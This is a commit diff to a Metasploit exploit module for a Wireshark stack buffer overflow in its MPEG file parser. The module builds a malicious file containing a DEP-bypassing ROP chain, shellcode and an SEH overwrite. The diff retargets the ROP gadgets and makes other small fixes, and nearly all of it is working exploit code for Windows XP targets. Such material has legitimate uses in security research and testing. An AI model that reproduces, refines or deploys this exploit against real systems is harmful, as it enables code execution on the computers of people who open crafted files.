@@ -13,7 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote
13
13
14
14
def initialize ( info = { } )
15
15
super ( update_info ( info ,
16
- 'Name' => 'Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow (remote) PoC ' ,
16
+ 'Name' => 'Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow' ,
17
17
'Description' => %q{
18
18
This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5
19
19
by generating an malicious file.)
@@ -48,7 +48,7 @@ def initialize(info = {})
48
48
[ 'WinXP SP3 Spanish (bypass DEP)' ,
49
49
{
50
50
'OffSet' => 70692 ,
51
- 'Ret' => 0x1c077cc3 , # pop/pop/ret -> krb5_32.dll module
51
+ 'Ret' => 0x1c077cc3 , # pop/pop/ret -> "c:\Program Files\Wireshark\ krb5_32.dll" (version: 1.6.3.16)
52
52
'jmpesp' => 0x68e2bfb9 ,
53
53
}
54
54
] ,
@@ -66,28 +66,29 @@ def initialize(info = {})
66
66
def junk
67
67
return rand_text ( 4 ) . unpack ( "L" ) [ 0 ] . to_i
68
68
end
69
+
69
70
def create_rop_chain ( )
70
71
71
72
# rop chain generated with mona.py - www.corelan.be
72
73
rop_gadgets =
73
74
[
74
- 0x78b41ccb , # POP EAX # RETN [MSVCR100. dll]
75
+ 0x61863c2a , # POP EAX # RETN [libgtk-win32-2.0-0. dll, ver: 2.24.14.0]
75
76
0x62d9027c , # ptr to &VirtualProtect() [IAT libcares-2.dll]
76
- 0x61970969 , # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll]
77
- 0x68605980 , # XCHG EAX,ESI # RETN [libglib- 2.0-0.dll]
78
- 0x64f94ba1 , # POP EBP # RETN [libfontconfig-1. dll]
79
- 0x63cd04f1 , # & push esp # ret [liblzma-5. dll]
80
- 0x6d4c331b , # POP EBX # RETN [libpangocairo-1 .0-0.dll]
77
+ 0x61970969 , # MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0 ]
78
+ 0x61988cf6 , # XCHG EAX,ESI # RETN [libgtk-win32- 2.0-0.dll, ver: 2.24.14.0 ]
79
+ 0x619c0a2a , # POP EBP # RETN [libgtk-win32-2.0-0. dll, ver: 2.24.14.0]
80
+ 0x61841e98 , # & push esp # ret [libgtk-win32-2.0-0. dll, ver: 2.24.14.0 ]
81
+ 0x6191d11a , # POP EBX # RETN [libgtk-win32-2 .0-0.dll, ver: 2.24.14.0]
81
82
0x00000201 , # 0x00000201-> ebx
82
- 0x78aa3bfb , # POP EDX # RETN [MSVCR100 .dll]
83
+ 0x5a4c1414 , # POP EDX # RETN [zlib1 .dll, ver: 1.2.5.0 ]
83
84
0x00000040 , # 0x00000040-> edx
84
- 0x78b29eda , # POP ECX # RETN [MSVCR100. dll]
85
+ 0x6197660f , # POP ECX # RETN [libgtk-win32-2.0-0. dll, ver: 2.24.14.0]
85
86
0x668242b9 , # &Writable location [libgnutls-26.dll]
86
- 0x70f67579 , # POP EDI # RETN [libxml2-2. dll]
87
+ 0x6199b8a5 , # POP EDI # RETN [libgtk-win32-2.0-0. dll, ver: 2.24.14.0
87
88
0x63a528c2 , # RETN (ROP NOP) [libgobject-2.0-0.dll]
88
- 0x6d5f8297 , # POP EAX # RETN [libgio- 2.0-0.dll]
89
+ 0x61863c2a , # POP EAX # RETN [libgtk-win32- 2.0-0.dll, ver: 2.24.14.0 ]
89
90
0x90909090 , # nop
90
- 0x6536979d , # PUSHAD # RETN [libpixman-1-0 .dll]
91
+ 0x6199652d , # PUSHAD # RETN [libgtk-win32-2.0-0 .dll, ver: 2.24.14.0 ]
91
92
] . flatten . pack ( "V*" )
92
93
93
94
return rop_gadgets
@@ -98,14 +99,14 @@ def exploit
98
99
99
100
print_status ( "Creating '#{ datastore [ 'FILENAME' ] } ' file ..." )
100
101
magic_header = "\xff \xfb " # mpeg magic_number
101
- packet = pattern_create ( 892 )
102
+ packet = pattern_create ( 892 )
102
103
ropchain = create_rop_chain
103
104
packet << ropchain
104
105
packet << payload . encoded # Shellcode
105
106
packet << pattern_create ( target [ 'OffSet' ] - 892 - ropchain . length - payload . encoded . length )
106
107
# SEH pointers overwrite (nseh & seh)
107
- packet << " \x90 \x90 \x90 \x90 " # nseh
108
- # 0xff is badchar then we can't make a jump back with jmp $-2000
108
+ packet << make_nops ( 4 ) # nseh
109
+ # \ 0xff is a badchar then we can't make a jump back with jmp $-2000
109
110
# After nseh and seh we haven't space, then we have to jump to another location.
110
111
# 0x6b805955 : # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [libjpeg-8.dll] ** | {PAGE_EXECUTE_REA
111
112
packet << "\x55 \x59 \x80 \x6b " # seh -> ADD ESP,offset # RETN
0 commit comments